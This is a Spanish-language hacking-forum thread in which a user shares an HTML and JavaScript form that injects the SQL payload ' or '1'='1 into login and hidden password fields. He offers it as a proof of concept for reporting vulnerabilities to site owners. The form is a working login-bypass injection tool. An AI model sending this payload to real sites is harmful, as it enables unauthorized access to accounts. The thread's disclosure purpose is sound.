elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 16:37  


Tema destacado: Sigue las noticias más importantes de elhacker.net en ttwitter!

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Reportar inyecciones SQL
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Reportar inyecciones SQL  (Leído 1,171 veces)
SnakingMax

Desconectado Desconectado

Mensajes: 167



Ver Perfil WWW
Reportar inyecciones SQL
« en: 5 Octubre 2010, 23:19 »

Os dejo un código muy sencillo en html+javascript que he utilizado para reportar inyecciones sql. Sin tener conocimientos de informática a cualquiera que se le haga el reporte puede comprobar la vulnerabilidad.


Código
<script language="javascript">
 
function enviar()
{
document.getElementById('valor1').value = "' or '1'='1"+document.getElementById('valor1').value;
return true;
}
 
</script>
 
Acceder al primer usuario cuyo LOGIN sea:
 
<form method="post" action="http://www.laweb.com/accion" onsubmit="enviar();">
<input name="login" id="valor1" type="text">
<input name="password" value="' or '1'='1" id="valor2" type="hidden">
<input value="Enviar" type="submit">
 
</form>
« Última modificación: 5 Octubre 2010, 23:36 por SnakingMax » En línea

Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: Reportar inyecciones SQL
« Respuesta #1 en: 5 Octubre 2010, 23:29 »

...
En línea

---
xassiz~


Desconectado Desconectado

Mensajes: 428



Ver Perfil WWW
Re: Reportar inyecciones SQL
« Respuesta #2 en: 5 Octubre 2010, 23:30 »

...
...
En línea

SnakingMax

Desconectado Desconectado

Mensajes: 167



Ver Perfil WWW
Re: Reportar inyecciones SQL
« Respuesta #3 en: 5 Octubre 2010, 23:38 »

Me había olvidado cambiar la inyección que tenía por ' or '1' = '1 y también desocultar un campo que tenía de tipo password. En la inyección en la que lo utilicé el campo password se modifica así que no se puede inyectar ahí.

Saludos
En línea

Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: Reportar inyecciones SQL
« Respuesta #4 en: 5 Octubre 2010, 23:50 »

@SnakingMax, para vos que es reportar?
En línea

---
SnakingMax

Desconectado Desconectado

Mensajes: 167



Ver Perfil WWW
Re: Reportar inyecciones SQL
« Respuesta #5 en: 6 Octubre 2010, 00:05 »

@SnakingMax, para vos que es reportar?

Pues para mi reportar es informar de algo (dar un reporte), y en este caso el reporte es una prueba del concepto.
Y si quieres adjuntas también info sobre como se corrige la vulnerabilidad desde la BD o desde el propio código PHP filtrando los caracteres que no se desean.

También podría haber puesto como título del post lanzador de inyecciones sql, pero le veo mejor utilidad al código como reporte en un correo electrónico.

Si me equivoco corrígeme, estoy en el foro para aprender y para aportar en lo que pueda  :D
« Última modificación: 6 Octubre 2010, 00:14 por SnakingMax » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda con 2 inyecciones SQL
Hacking Avanzado
er_davids 3 1,219 Último mensaje 30 Mayo 2011, 22:43
por 4rkn63l
duda con inyecciones SQL
Hacking Básico
larahot 2 827 Último mensaje 15 Julio 2011, 00:08
por Shell Root
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines